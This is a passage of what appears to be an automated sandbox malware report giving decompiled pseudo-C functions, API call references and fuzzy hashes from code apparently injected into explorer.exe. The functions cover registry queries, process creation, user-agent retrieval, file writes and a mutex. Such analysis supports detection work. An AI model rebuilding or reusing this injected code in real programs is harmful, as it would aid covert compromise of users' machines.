0x00f5f175
0x00f5f175
0x00f5f17a
0x00f5f183

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00F5F154
LoadLibraryA.KERNELBASE(00000000), ref: 00F5F161

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 7d44f1f397550f040a26e323d940c2fa3bbe3aa5db063ca022a14242ed1272db
Instruction ID: 910af6b0b951c473f2ad238acd290d02048cbd067e199d5a8db01576d6149da2
Opcode Fuzzy Hash: 7d44f1f397550f040a26e323d940c2fa3bbe3aa5db063ca022a14242ed1272db
Instruction Fuzzy Hash: 30F03072504518EBDB01AF68EC018AE77A8FB05362B1401B5FE05D7251DB70DE08FB94

Uniqueness

Uniqueness Score: -1.00%

Function 00F6C891, Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00F6C891(void* __edx, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void* __ecx;
				char _t9;
				intOrPtr _t13;
				void* _t15;
				char _t16;
				void* _t23;
				intOrPtr _t24;
				void* _t27;
				void* _t31;

				_t31 = __edx;
				_push(_t23);
				_push(_t23);
				ArcTo(0, 0x31, 0x4b, 0x4a, 0x1f, 0x3b, 0x4b, 5, 0x61);
				_t9 = E00F58AF1(_t23, 0x3dd);
				_t24 =  *0xf89720; // 0xf90000
				_v12 = _t9;
				E00F51100(__fp0, 0x80000001, _t9, _t24 + 0x438, 1); // executed
				E00F5BA86( &_v12);
				_t13 =  *0xf89720; // 0xf90000
				if( *((intOrPtr*)(_t13 + 0x214)) == 3) {
					_t15 = E00F5C373(_t31, 0x3c);
					_t33 = _t15;
					if(_t15 != 0xffffffff) {
						_t16 = E00F5AC58(0x100);
						_pop(_t27);
						_v8 = _t16;
						if(_t16 != 0) {
							E00F5CE46(_v8, 0x80, E00F58AF1(_t27, 0x460), _t33);
							if(E00F5BAA0(_v8, 0, 0xbb8, 1) != 0) {
								_push(0x3c);
								E00F5C69A();
							}
							E00F5AB81( &_v8, 0xfffffffe);
						}
					}
				}
				 *0xf89700 =  *0xf89700 & 0x00000000;
				return 0;
			}

0x00f6c891
0x00f6c894
0x00f6c895
0x00f6c8a8
0x00f6c8b3
0x00f6c8b8
0x00f6c8cd
0x00f6c8d0
0x00f6c8d9
0x00f6c8de
0x00f6c8ed
0x00f6c8f2
0x00f6c8f7
0x00f6c8fd
0x00f6c904
0x00f6c909
0x00f6c90a
0x00f6c90f
0x00f6c925
0x00f6c940
0x00f6c942
0x00f6c944
0x00f6c949
0x00f6c950
0x00f6c956
0x00f6c90f
0x00f6c957
0x00f6c958
0x00f6c962

APIs

ArcTo.GDI32(00000000,00000031,0000004B,0000004A,0000001F,0000003B,0000004B,00000005,00000061,?,?,?,00F54656), ref: 00F6C8A8

Part of subcall function 00F51100: memset.MSVCRT ref: 00F51126
Part of subcall function 00F51100: RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,00000000,?,?,00000001), ref: 00F51179
Part of subcall function 00F51100: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000001), ref: 00F511AD
Part of subcall function 00F51100: BitBlt.GDI32(00000000,0000005A,00000050,00000022,0000001E,00000000,00000027,0000003B,0000002F), ref: 00F512BC

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

Part of subcall function 00F5CE46: _vsnwprintf.MSVCRT ref: 00F5CE63

Part of subcall function 00F5BAA0: memset.MSVCRT ref: 00F5BAB4
Part of subcall function 00F5BAA0: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000044,?,?,00000000,00000001), ref: 00F5BAFD
Part of subcall function 00F5BAA0: GetExitCodeProcess.KERNEL32 ref: 00F5BB21

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Processmemset$AllocateCodeCreateExitHeapInfoOpenQuery_vsnwprintf
String ID:
API String ID: 1568952531-0
Opcode ID: afd3d534447eb09a16df82fbf3913fb0735c3dad12169632976c3cdf2844adae
Instruction ID: a3ecbec09783b0659890004e90810c848b4d39d61fbdcf398743c7733fc9b37e
Opcode Fuzzy Hash: afd3d534447eb09a16df82fbf3913fb0735c3dad12169632976c3cdf2844adae
Instruction Fuzzy Hash: 98112B71AD4309BBFB15A7A49C4BFBE365C9700B62F100115FB45B90C1EFE89644E3A5

Uniqueness

Uniqueness Score: -1.00%

Function 00F5441A, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00F5441A(void* __edi, void* __fp0) {
				signed int _v8;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				void* __ebx;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t33;
				intOrPtr* _t34;
				signed int _t41;
				void* _t45;
				intOrPtr* _t47;
				intOrPtr* _t48;
				void* _t58;

				_t58 = __fp0;
				_t45 = __edi;
				_v8 = _v8 & 0x00000000;
				_t48 = E00F5AC58(0x10);
				_t25 =  *0xf89720; // 0xf90000
				if( *((short*)(_t25 + 0x22a)) == 0x3a) {
					_t44 =  *((intOrPtr*)(_t25 + 0x228));
					_v40 =  *((intOrPtr*)(_t25 + 0x228));
					_v38 =  *((intOrPtr*)(_t25 + 0x22a));
					_v36 =  *((intOrPtr*)(_t25 + 0x22c));
					_v34 = 0;
					GetDriveTypeW( &_v40); // executed
				}
				 *(_t48 + 4) =  *(_t48 + 4) & 0x00000000;
				 *_t48 = 2;
				_t26 =  *0xf89720; // 0xf90000
				_t27 =  *((intOrPtr*)(_t26 + 0x224));
				 *((intOrPtr*)(_t48 + 8)) =  *((intOrPtr*)(_t26 + 0x224));
				_t28 = E00F54A0E(_t58, _t27);
				_t16 = _t48 + 0xc; // 0xc
				_t39 = _t16;
				_pop(_t41);
				 *_t16 = _t28;
				if(_t28 == 0) {
					L9:
					if(E00F54BFE() == 0) {
						goto L12;
					} else {
						_v8 = _v8 | 0xffffffff;
					}
				} else {
					_t44 =  *_t28;
					_t41 = 0;
					_push(_t45);
					if(_t44 == 0) {
						L7:
						_t33 = 0;
					} else {
						_t34 =  *((intOrPtr*)(_t28 + 4));
						_t47 = _t34;
						while( *_t47 != 0x3b) {
							_t41 = _t41 + 1;
							_t47 = _t47 + 8;
							if(_t41 < _t44) {
								continue;
							} else {
								goto L7;
							}
							goto L8;
						}
						_t33 =  *((intOrPtr*)(_t34 + 4 + _t41 * 8));
					}
					L8:
					if(_t33 != 0) {
						L12:
						E00F5839A(_t41, _t44, _t58, _t48); // executed
					} else {
						goto L9;
					}
				}
				E00F5C994(_t39);
				return _v8;
			}

0x00f5441a
0x00f5441a
0x00f54420
0x00f5442d
0x00f5442f
0x00f5443d
0x00f5443f
0x00f54446
0x00f54451
0x00f5445c
0x00f54462
0x00f5446a
0x00f5446a
0x00f54470
0x00f54474
0x00f5447a
0x00f5447f
0x00f54486
0x00f54489
0x00f5448e
0x00f5448e
0x00f54491
0x00f54492
0x00f54496
0x00f544ba
0x00f544c1
0x00000000
0x00f544c3
0x00f544c3
0x00f544c3
0x00f54498
0x00f54498
0x00f5449a
0x00f5449c
0x00f5449f
0x00f544b3
0x00f544b3
0x00f544a1
0x00f544a1
0x00f544a4
0x00f544a6
0x00f544ab
0x00f544ac
0x00f544b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00f544b1
0x00f544c9
0x00f544c9
0x00f544b5
0x00f544b8
0x00f544cf
0x00f544d0
0x00000000
0x00000000
0x00000000
0x00f544b8
0x00f544d6
0x00f544e1

APIs

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

GetDriveTypeW.KERNELBASE(?), ref: 00F5446A

Part of subcall function 00F5839A: GetModuleHandleA.KERNEL32(?,00000000,00000000,0000000C), ref: 00F583EC
Part of subcall function 00F5839A: GetModuleHandleA.KERNEL32(?), ref: 00F583F6

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: HandleModule$AllocateDriveHeapType
String ID:
API String ID: 2730524069-0
Opcode ID: 92396b146a83289aee00ae18594c35a38670c1097dbb1194d9776aa3a1a4cc26
Instruction ID: 0bad73a19879d72433d1aeef65e081c7a4f5299bf76d1fdba8315ae0763855b6
Opcode Fuzzy Hash: 92396b146a83289aee00ae18594c35a38670c1097dbb1194d9776aa3a1a4cc26
Instruction Fuzzy Hash: 4E21D431900205DBCB10EFA4D808BEA73F4FF08365F244169ED09D7291EB74E888E755

Uniqueness

Uniqueness Score: -1.00%

Function 00F54192, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F54192(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8) {
				void* __ebx;
				void* __esi;
				int _t17;
				signed int _t19;
				signed int _t22;
				signed int _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;

				if(__edi == 0) {
					L4:
					return _t17 | 0xffffffff;
				} else {
					_t19 =  *0xf89814; // 0x2
					_t20 = _t19 << 5;
					_t1 = _t20 + 0x20; // 0x22
					if(E00F5AC9A(_t1, 0xf89718, _t19 << 5) != 0) {
						_t29 =  *0xf89718; // 0x547bdf0
						_t22 =  *0xf89814; // 0x2
						 *0xf89814 =  *0xf89814 + 1;
						_t23 = _t22 << 5;
						 *((intOrPtr*)(_t23 + _t29)) = __edi;
						_t30 =  *0xf89718; // 0x547bdf0
						 *(_t23 + _t30 + 4) =  *(_t23 + _t30 + 4) & 0x00000000;
						_t31 =  *0xf89718; // 0x547bdf0
						 *((intOrPtr*)(_t23 + _t31 + 0x18)) = _a8;
						_t32 =  *0xf89718; // 0x547bdf0
						 *(_t23 + _t32 + 0xc) =  *(_t23 + _t32 + 0xc) & 0x00000000;
						_t33 =  *0xf89718; // 0x547bdf0
						 *((intOrPtr*)(_t23 + _t33 + 8)) = _a4;
						_t17 = IsValidCodePage(0x4e); // executed
						goto L4;
					} else {
						_t24 = 0xfffffffe;
						return _t24;
					}
				}
			}

0x00f54197
0x00f5420c
0x00f54210
0x00f54199
0x00f54199
0x00f5419f
0x00f541a3
0x00f541b6
0x00f541bd
0x00f541c3
0x00f541cb
0x00f541d1
0x00f541d4
0x00f541d7
0x00f541dd
0x00f541e2
0x00f541e8
0x00f541ec
0x00f541f2
0x00f541f7
0x00f54202
0x00f54206
0x00000000
0x00f541b8
0x00f541ba
0x00f541bc
0x00f541bc
0x00f541b6

APIs

IsValidCodePage.KERNELBASE(0000004E,?,00F54020,00000001,00000172,00000000,00000000,?,?,?,00F55022), ref: 00F54206

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CodePageValid
String ID:
API String ID: 1911128615-0
Opcode ID: 5d80209a32b52517994b979efca9bb9eebf6477e1d8222a26f3791a2598815f4
Instruction ID: 06210758f1866b3c96a783416108d03eba92d1e371eb777df74bcf53f187bc7e
Opcode Fuzzy Hash: 5d80209a32b52517994b979efca9bb9eebf6477e1d8222a26f3791a2598815f4
Instruction Fuzzy Hash: FD0171711082088FD714DF58E9C0DF537E4EB84325B198259D91D8B2A1CB71A885EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F5D29B, Relevance: 1.5, APIs: 1, Instructions: 41fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00F72AD0,00000000,00000000,00000000,00000000,00000001,?,00F5D15B,00000000,00000000,00000000,?,?,00F6CA33), ref: 00F5D2D2

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 24c0df31899eef2560fa76fc7d06fc4ddeaa3305cfd4a05757cdb5504eb7aff6
Instruction ID: 85f691c6664dcfb5a7d7e89dda9cc990d6fe1cee325794ab3a12e9dec2d2cb47
Opcode Fuzzy Hash: 24c0df31899eef2560fa76fc7d06fc4ddeaa3305cfd4a05757cdb5504eb7aff6
Instruction Fuzzy Hash: E1F0E7B6901118FF9B21CF99CD44DEB7BBCEB85761B144165FD0AD7104E630EA04EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F607FB, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00F607FB() {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t13;
				intOrPtr* _t14;
				void* _t15;

				_t5 =  *0xf89734; // 0x547fbb0
				if( *_t5 == 0) {
					_v8 = E00F62CB7();
					 *0xf897f8 = E00F5B670(0, _t7);
					E00F5B9F4( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t13 = E00F5AC58(0x101);
					 *0xf897f8 = _t13;
					_t14 =  *0xf89734; // 0x547fbb0
					_t15 =  *_t14(0, _t13,  &_v8); // executed
					if(_t15 == 0) {
						L4:
						return 0;
					} else {
						return E00F5AB81(0xf897f8, 0xffffffff) | 0xffffffff;
					}
				}
			}

0x00f607ff
0x00f60807
0x00f6084f
0x00f6085a
0x00f60863
0x00000000
0x00f60809
0x00f6080e
0x00f60815
0x00f60820
0x00f60825
0x00f6082c
0x00f60830
0x00f60868
0x00f6086b
0x00f60832
0x00f60844
0x00f60844
0x00f60830

APIs

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

ObtainUserAgentString.URLMON(00000000,00000000,00000100), ref: 00F6082C

Part of subcall function 00F5AB81: RtlFreeHeap.NTDLL(00000000,00000000,00F7B218,0000011C), ref: 00F5ABC7

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AgentAllocateFreeObtainStringUser
String ID:
API String ID: 471734292-0
Opcode ID: 76fe1821b03f8aadbddcc88274a344eda4d8f9b4497dfe2f0330b7e2d216227a
Instruction ID: d31b23e9eeadabdc29dabeb7f913b9c83431e662704c401c04ae74a083c32789
Opcode Fuzzy Hash: 76fe1821b03f8aadbddcc88274a344eda4d8f9b4497dfe2f0330b7e2d216227a
Instruction Fuzzy Hash: 3FF0AF71518208ABE744EFB8DC46EEE37E8DB00331F240269B521D71D0EAB49944F760

Uniqueness

Uniqueness Score: -1.00%

Function 00F5AB81, Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F5AB81(char _a4, intOrPtr _a8) {
				char _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E00F5ADF7(_t9);
						}
					} else {
						_t4 = E00F5ACD6(_t9);
					}
					E00F5AC0A(_t9, 0, _t4);
					_t3 = RtlFreeHeap( *0xf897d8, 0, _t9); // executed
				}
				return _t3;
			}

0x00f5ab84
0x00f5ab89
0x00f5abcf
0x00f5abcf
0x00f5ab8c
0x00f5ab90
0x00f5ab92
0x00f5ab95
0x00f5ab9b
0x00f5aba9
0x00f5abad
0x00f5abad
0x00f5ab9d
0x00f5ab9e
0x00f5aba3
0x00f5abb6
0x00f5abc7
0x00f5abc7
0x00000000

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00F7B218,0000011C), ref: 00F5ABC7

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b6365eccd81cf6fa8b64f9fb10bcd4efbb22af6040f06be9b1f1998d0e4e1c0f
Instruction ID: 6bdfbaca42d5349941c01d5003ae3fdc2899a76b1d76f9e7dddf7d4dc82224b1
Opcode Fuzzy Hash: b6365eccd81cf6fa8b64f9fb10bcd4efbb22af6040f06be9b1f1998d0e4e1c0f
Instruction Fuzzy Hash: A1F0A031A011187BDB202A249C01FAE375AEF41B73F240340FE14AA2D1C7649CA8B2E3

Uniqueness

Uniqueness Score: -1.00%

Function 00F5D1E8, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F5D1E8(WCHAR* _a4, long _a8) {
				intOrPtr _t9;
				void* _t12;

				_t12 = CreateFileW(_a4, 0x40000000, 0, 0, _a8, 0x80, 0);
				if(_t12 != 0xffffffff) {
					if(_a8 == 4) {
						_t9 =  *0xf89740; // 0x547f6c8
						 *((intOrPtr*)(_t9 + 0x80))(_t12, 0, 0, 2);
					}
					return _t12;
				}
				return 0;
			}

0x00f5d20a
0x00f5d20f
0x00f5d219
0x00f5d21b
0x00f5d225
0x00f5d225
0x00000000
0x00f5d22b
0x00000000

APIs

CreateFileW.KERNELBASE(00000800,40000000,00000000,00000000,00000080,00000080,00000000,?,00000200,?,00F5D268,00000800,00000002,00000200,?,00F5B197), ref: 00F5D207

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 113090c43e706f69108b3e3a773a3ea9e766092149dcbd379a42e829c99f89ac
Instruction ID: afba8dfc6bca9c6a77daf947d9fa2fad6938f7b40ad15e5ba7ab366d20691f6c
Opcode Fuzzy Hash: 113090c43e706f69108b3e3a773a3ea9e766092149dcbd379a42e829c99f89ac
Instruction Fuzzy Hash: D2F0C7366451147BC7305A56AC4CFEB3F99EB466B1F054164FB19C6151C670D805D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F5D1A2, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F5D1A2(void* __ecx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				void* _t12;
				void* _t22;

				_t22 = 0;
				if(_a12 == 0) {
					L3:
					_t12 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_a4, _a8 + _t22, _a12 - _t22,  &_v8, 0) == 0) {
							break;
						}
						_t22 = _t22 + _v8;
						if(_t22 < _a12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t12 = 0;
				}
				L4:
				return _t12;
			}

0x00f5d1a7
0x00f5d1ac
0x00f5d1de
0x00f5d1e0
0x00f5d1ae
0x00f5d1ae
0x00f5d1ae
0x00f5d1d4
0x00000000
0x00000000
0x00f5d1d6
0x00f5d1dc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00f5d1dc
0x00f5d1e4
0x00f5d1e4
0x00f5d1e1
0x00f5d1e3

APIs

WriteFile.KERNELBASE(00000800,00000080,?,00000000,00000000,00000000,00000002,?,00F5D281,00000000,00000080,?,00000200,?,00F5B197), ref: 00F5D1CC

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 59412aa1b0b141f2991d561a0f36cb8b6af04bbd82c6b9d10bc62365fb3c08b3
Instruction ID: f281e1bdbbc70fc4a2ac67212d880567d84c5441cb8592499f826ae8720d5bd5
Opcode Fuzzy Hash: 59412aa1b0b141f2991d561a0f36cb8b6af04bbd82c6b9d10bc62365fb3c08b3
Instruction Fuzzy Hash: FDF0FE72A11519AFEB20DF58CC05BAE7BACFB04751F140464BD15D3100D770EE04E794

Uniqueness

Uniqueness Score: -1.00%

Function 00F5D0BD, Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00F5D0BD(intOrPtr _a4) {
				intOrPtr _t5;
				intOrPtr _t7;
				void* _t13;
				void* _t15;

				_t5 =  *0xf89740; // 0x547f6c8
				_t13 = 0;
				_t15 =  *((intOrPtr*)(_t5 + 0xbc))(2, 0, _a4);
				if(_t15 != 0) {
					_t7 =  *0xf89740; // 0x547f6c8
					_push(_t15);
					if( *((intOrPtr*)(_t7 + 0xc0))() != 0) {
						_t13 = 1;
					}
					FindCloseChangeNotification(_t15);
					return _t13;
				}
				return 0;
			}

0x00f5d0c0
0x00f5d0ca
0x00f5d0d5
0x00f5d0d9
0x00f5d0e1
0x00f5d0e6
0x00f5d0ef
0x00f5d100
0x00f5d100
0x00f5d0f7
0x00000000
0x00f5d0fa
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(00000000,?,00F577DF,?,00000000,00000000,?,?,?,?,00F57700,00000000), ref: 00F5D0F7

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8d2f66725bd06d78cc7163dd90f4f3e0430998814b8d877a45410176f73749bc
Instruction ID: db4561a3b8ed5a6c5262f87180ed604d5891003d0e842a20a8669100871c9017
Opcode Fuzzy Hash: 8d2f66725bd06d78cc7163dd90f4f3e0430998814b8d877a45410176f73749bc
Instruction Fuzzy Hash: 61F09B3221A1149BD3319B6A9C0CFBF3B98FBC5762F190074FA0AC7151D6609802F7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F5C320, Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F5C320(void* __ecx, intOrPtr _a4) {
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t25;

				_t25 = _a4;
				_t14 =  *0xf89740; // 0x547f6c8
				_t15 =  *((intOrPtr*)(_t14 + 0x2c))( *(_t25 + 0x1c), 0x3a98);
				if(_t15 == 0 || _t15 == 0x80) {
					FindCloseChangeNotification( *(_t25 + 0x1c));
					 *((intOrPtr*)(_t25 + 0x18)) =  *((intOrPtr*)(_t25 + 8))( *((intOrPtr*)(_t25 + 0xc)));
					if(( *(_t25 + 0x14) & 0x00000001) == 0) {
						E00F5C10C(_t25, 1);
					}
					return  *((intOrPtr*)(_t25 + 0x18));
				} else {
					return 0;
				}
			}

0x00f5c324
0x00f5c330
0x00f5c335
0x00f5c33a
0x00f5c34f
0x00f5c35c
0x00f5c35f
0x00f5c365
0x00f5c36a
0x00000000
0x00f5c343
0x00000000
0x00f5c343

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00F5C34F

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2636286dfa8bf3a8e185a1b3c697a1183d10be1e6d5d62ea33e88b7c2ec09b7b
Instruction ID: 4a32426b9ba94b8fe629dfd3973be53b99362bb1bb7cd08ea6e09d63188452b7
Opcode Fuzzy Hash: 2636286dfa8bf3a8e185a1b3c697a1183d10be1e6d5d62ea33e88b7c2ec09b7b
Instruction Fuzzy Hash: DBF03A71214B089FD7209F29D848B56BBF8BB05762B048919FA87D7662C761E848EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F5D25A, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00F5D25A(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				void* _t13;
				void* _t14;

				_t5 = E00F5D1E8(_a4, 2); // executed
				_t14 = _t5;
				_pop(_t13);
				if(_t14 != 0) {
					_t6 = E00F5D1A2(_t13, _t14, _a8, _a12); // executed
					if(_t6 != 0) {
						FindCloseChangeNotification(_t14);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}

0x00f5d263
0x00f5d268
0x00f5d26b
0x00f5d26e
0x00f5d27c
0x00f5d286
0x00f5d293
0x00000000
0x00f5d296
0x00f5d28a
0x00000000
0x00f5d28a
0x00000000

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e4d745b6ad43930a36415612043cd7f8d47ec061038928e8e4e3747d8939d47c
Instruction ID: 5ae78ab73c18c14bf1a5be5661702f4ed55919ebb2e0cd954b10ffcf9af9893c
Opcode Fuzzy Hash: e4d745b6ad43930a36415612043cd7f8d47ec061038928e8e4e3747d8939d47c
Instruction Fuzzy Hash: B0E0923340A6157BAB315EA59C01EAE3B48EF063B6F640711FE25995D1DA21C914A3C1

Uniqueness

Uniqueness Score: -1.00%

Function 00F5C0D0, Relevance: 1.5, APIs: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F5C0D0() {
				signed int _t3;

				_t3 = CreateMutexA(0, 0, 0);
				 *0xf8983c = _t3;
				if(_t3 != 0) {
					_t3 = E00F5AC58(0x1000);
					 *0xf897e4 = _t3;
					if(_t3 == 0) {
						goto L1;
					} else {
						 *0xf897e0 =  *0xf897e0 & 0x00000000;
						return 0;
					}
				} else {
					L1:
					return _t3 | 0xffffffff;
				}
			}

0x00f5c0db
0x00f5c0e1
0x00f5c0e8
0x00f5c0f3
0x00f5c0f9
0x00f5c100
0x00000000
0x00f5c102
0x00f5c102
0x00f5c10b
0x00f5c10b
0x00f5c0ea
0x00f5c0ea
0x00f5c0ed
0x00f5c0ed

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000,00F54FFE), ref: 00F5C0DB

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 5aa4cc7bd03a6d46fac2d96a5b3153eaefe3f2ba64da0ead1443f759c7696c81
Instruction ID: dacf389dc10aad1dd6222a662ea8c899b22f6a7aac42c29d99539c0b32220c6b
Opcode Fuzzy Hash: 5aa4cc7bd03a6d46fac2d96a5b3153eaefe3f2ba64da0ead1443f759c7696c81
Instruction Fuzzy Hash: 1DE012716A830A9AE7108F34AD0ABB936D0A704763F588265FA15C50D4EFF4C404BB10

Uniqueness

Uniqueness Score: -1.00%

Function 00F5D231, Relevance: 1.5, APIs: 1, Instructions: 19
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00F5D231(WCHAR* _a4) {
				signed int _t6;

				_t6 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				_t3 = _t6 + 1; // 0x1
				asm("sbb eax, eax");
				return  ~_t3 & _t6;
			}

0x00f5d24a
0x00f5d24f
0x00f5d254
0x00f5d259

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00F5D123,00000000,00000000,00000400,00000000,?,?,00F6CA33), ref: 00F5D24A

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2290b5b29e7f68e5805fec0d8e6432c794b973c438a06482d25f97620186810a
Instruction ID: cc44732c8d6e5a4699dd3bc8fdfa65752403c64db170488771b487d374e67c54
Opcode Fuzzy Hash: 2290b5b29e7f68e5805fec0d8e6432c794b973c438a06482d25f97620186810a
Instruction Fuzzy Hash: 23D0A9323A8208BFEB008E74DC02FBA37DDE700600F144228BA0ADA1A1E6A2E9008650

Uniqueness

Uniqueness Score: -1.00%

Function 00F5B081, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

